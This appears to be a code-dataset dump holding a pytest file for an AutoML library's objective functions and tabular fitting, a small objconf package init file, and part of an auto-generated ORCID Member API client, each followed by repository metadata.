model_name="obj_3",
task_mode="regression",
objective="MAE",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_4():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_4",
task_mode="regression",
objective="R2",
validation=True,
valid_size=0.15,
full_status=True,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_5():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_5",
task_mode="classification",
objective="precision",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_6():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_6",
task_mode="classification",
objective="hinge",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_7():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_7",
task_mode="classification",
objective="f1",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_8():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_8",
task_mode="regression",
objective="MSE",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_9():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_9",
task_mode="regression",
objective="MAX",
validation=True,
valid_size=0.15,
full_status=True,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_heart():
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
mol = My_AutoML.AutoTabular(
model_name="heart",
search_algo="GridSearch",
timeout=60,
)
mol.fit(data[features], data[response])
y_pred = mol.predict(data[features])
assert (
os.path.exists("tmp/heart/init.txt") == True
), "Classification for Heart data failed to initiated."
assert mol._fitted == True, "Classification for Heart data failed to fit."
assert (
os.path.exists("tmp/heart/optimal_setting.txt") == True
), "Classification for Heart data failed to find optimal setting."
def test_insurance():
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
mol = My_AutoML.AutoTabular(
model_name="insurance",
objective="MAE",
timeout=60,
)
mol.fit(data[features], data[response])
y_pred = mol.predict(data[features])
assert (
os.path.exists("tmp/insurance/init.txt") == True
), "Regression for Insurance data failed to initiated."
assert mol._fitted == True, "Regression for Insurance data failed to fit."
assert (
os.path.exists("tmp/insurance/optimal_setting.txt") == True
), "Regression for Insurance data failed to find optimal setting."
def test_insurance_R2():
from My_AutoML._hpo._base import AutoTabularBase
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
mol = AutoTabularBase(
model_name="insurance_R2",
task_mode="regression",
objective="R2",
max_evals=8,
timeout=60,
)
mol.fit(data[features], data[response])
assert (
os.path.exists("tmp/insurance_R2/init.txt") == True
), "Regression for Insurance data failed to initiated."
assert mol._fitted == True, "Regression for Insurance data failed to fit."
assert (
os.path.exists("tmp/insurance_R2/optimal_setting.txt") == True
), "Regression for Insurance data failed to find optimal setting."
def test_stroke_import_version():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="stroke",
objective="auc",
timeout=60,
)
mol.fit(data[features], data[response])
assert (
os.path.exists("tmp/stroke/init.txt") == True
), "Classification for Stroke data (import_version) failed to initiated."
assert (
mol._fitted == True
), "Classification for Stroke data (import_version) failed to fit."
assert (
os.path.exists("tmp/stroke/optimal_setting.txt") == True
), "Classification for Stroke data (import_version) failed to find optimal setting."
def test_stroke_loading():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="stroke",
timeout=60,
)
mol.fit(data[features], data[response])
assert mol._fitted == True, "AutoTabular with loading failed to fit."
def test_stroke_with_limit():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="no_valid",
encoder=["DataEncoding"],
imputer=["SimpleImputer"],
balancing=["no_processing"],
scaling=["no_processing"],
feature_selection=["no_processing"],
models=["DecisionTree"],
validation=False,
search_algo="GridSearch",
objective="precision",
timeout=60,
)
mol.fit(data[features], data[response])
assert mol._fitted == True, "AutoTabular with limited space failed to fit."
| 30.44887
| 111
| 0.640718
| 2,972
| 28,287
| 5.916891
| 0.098923
| 0.045038
| 0.038214
| 0.059369
| 0.873244
| 0.864885
| 0.857947
| 0.856753
| 0.841968
| 0.83304
| 0
| 0.009497
| 0.2481
| 28,287
| 928
| 112
| 30.481681
| 0.817293
| 0.095203
| 0
| 0.831276
| 0
| 0
| 0.277847
| 0.023288
| 0
| 0
| 0
| 0
| 0.068587
| 1
| 0.020576
| false
| 0
| 0.08642
| 0
| 0.106996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c1afc5a2de3c0fe2bc4f6c7211345753cbadf43c
| 158
|
py
|
Python
|
objconf/__init__.py
|
milosta/objconf
|
7d8ffbe0cd89cc1330b6228d3a59c0d7fe41a648
|
[
"Apache-2.0"
] | 3
|
2021-08-28T08:06:39.000Z
|
2021-10-01T18:05:05.000Z
|
objconf/__init__.py
|
milosta/objconf
|
7d8ffbe0cd89cc1330b6228d3a59c0d7fe41a648
|
[
"Apache-2.0"
] | null | null | null |
objconf/__init__.py
|
milosta/objconf
|
7d8ffbe0cd89cc1330b6228d3a59c0d7fe41a648
|
[
"Apache-2.0"
] | null | null | null |
__all__ = ('Config', 'ExtraVals', 'Attribute', 'UNDEFINED')
from objconf.attributes import Attribute, UNDEFINED
from objconf.config import Config, ExtraVals
| 31.6
| 59
| 0.778481
| 17
| 158
| 7
| 0.529412
| 0.252101
| 0.369748
| 0.487395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107595
| 158
| 4
| 60
| 39.5
| 0.843972
| 0
| 0
| 0
| 0
| 0
| 0.208861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1cf4cd65aed033235e7d94e2c18ac05b673abdb
| 339,912
|
py
|
Python
|
orcid_api/apis/development_member_apiv30_dev1_api.py
|
tenet-ac-za/NZ-ORCID-Hub
|
f1183fbb94509b102fa58d7812ed33d8f35c5d4d
|
[
"MIT"
] | 15
|
2017-02-06T01:41:57.000Z
|
2021-07-22T08:53:40.000Z
|
orcid_api/apis/development_member_apiv30_dev1_api.py
|
tenet-ac-za/NZ-ORCID-Hub
|
f1183fbb94509b102fa58d7812ed33d8f35c5d4d
|
[
"MIT"
] | 82
|
2017-03-23T00:30:04.000Z
|
2022-02-01T00:10:34.000Z
|
orcid_api/apis/development_member_apiv30_dev1_api.py
|
tenet-ac-za/NZ-ORCID-Hub
|
f1183fbb94509b102fa58d7812ed33d8f35c5d4d
|
[
"MIT"
] | 6
|
2017-03-23T07:26:05.000Z
|
2021-02-23T11:20:21.000Z
|
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DevelopmentMemberAPIV30Dev1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_permission_notification_json(self, orcid, **kwargs):
"""
Add a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_permission_notification_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param NotificationPermission body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_permission_notification_json_with_http_info(orcid, **kwargs)
else:
(data) = self.add_permission_notification_json_with_http_info(orcid, **kwargs)
return data
def add_permission_notification_json_with_http_info(self, orcid, **kwargs):
"""
Add a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_permission_notification_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param NotificationPermission body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_permission_notification_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `add_permission_notification_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_address_json(self, orcid, **kwargs):
"""
Add an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_address_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_address_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_address_json_with_http_info(orcid, **kwargs)
return data
def create_address_json_with_http_info(self, orcid, **kwargs):
"""
Add an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_address_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_address_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_address_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_education_json(self, orcid, **kwargs):
"""
Create an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_education_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Education body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_education_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_education_json_with_http_info(orcid, **kwargs)
return data
def create_education_json_with_http_info(self, orcid, **kwargs):
"""
Create an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_education_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Education body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_education_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_education_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_employment_json(self, orcid, **kwargs):
"""
Create an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_employment_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Employment body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_employment_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_employment_json_with_http_info(orcid, **kwargs)
return data
def create_employment_json_with_http_info(self, orcid, **kwargs):
"""
Create an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_employment_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Employment body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_employment_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_employment_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_external_identifier_json(self, orcid, **kwargs):
"""
Add external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_external_identifier_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_external_identifier_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_external_identifier_json_with_http_info(orcid, **kwargs)
return data
def create_external_identifier_json_with_http_info(self, orcid, **kwargs):
"""
Add external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_external_identifier_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_external_identifier_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_external_identifier_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
